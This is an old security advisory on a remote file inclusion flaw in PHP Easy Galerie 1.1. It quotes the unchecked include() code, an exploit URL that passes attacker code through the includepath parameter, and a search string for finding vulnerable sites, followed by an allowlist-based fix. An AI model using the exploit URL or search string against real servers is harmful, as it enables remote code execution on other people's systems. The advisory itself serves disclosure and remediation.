PHP Easy Galerie Index.PHP Remote File Include Vulnerability May 21 2006 10:45AM
craziest gmail com
Vendor: Power-Place

www.power-place.net

(PHP Easy Galerie 1.1)

-------------------------------------------------

Author:Craziest

Contact: craziest(at)gmail(dot)com

Vuln discovered by BrEakerS

--------------------------------------------------

Method: An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process by

source:

// $includepath is passed to include without any validation
if(isset($includepath)){
    include ("$includepath");
}

http://[url]/gallerypath/index.php?includepath=evilcode

Search:"Power-Place 2003/2004"

--------------------------------------------------------

Greets:Rootshell Security Group
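
One way to fix the include shown above, as an added example (not code from the advisory or from Power-Place): the request value is treated as a key into a fixed allowlist instead of a path. The allowlist keys, file names and demo directory are hypothetical, and it is an assumption that the original script relied on register_globals to populate $includepath.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist (not from the advisory): request key => local file.
const ALLOWED_INCLUDES = [
    'header'  => 'header.php',
    'gallery' => 'gallery.php',
];

// Returns the absolute path of an allowlisted file inside $baseDir, or null.
function resolve_include($key, string $baseDir): ?string
{
    // Rejects arrays (?includepath[]=x), URLs and traversal strings alike:
    // only exact allowlist keys pass.
    if (!is_string($key) || !array_key_exists($key, ALLOWED_INCLUDES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_INCLUDES[$key]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }
    // Defence in depth: the resolved path (symlinks followed) must stay in $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary include directory holding one allowlisted file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'galerie_includes_demo';
if (!is_dir($base)) {
    mkdir($base, 0700);
}
file_put_contents($base . DIRECTORY_SEPARATOR . 'header.php', "<?php echo 'header';\n");

// Constructed inputs; in the application the value would be read explicitly
// from $_GET['includepath'] rather than from a register_globals variable.
$samples = ['header', 'gallery', 'http://example.invalid/x.txt', '../header.php', ['header']];
foreach ($samples as $input) {
    $file = resolve_include($input, $base);
    $label = is_string($input) ? $input : '(array)';
    echo str_pad($label, 30), $file === null ? 'rejected' : 'include ' . $file, "\n";
}
```

Setting allow_url_include = Off in php.ini (the default since PHP 5.2) additionally stops include from fetching URLs.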
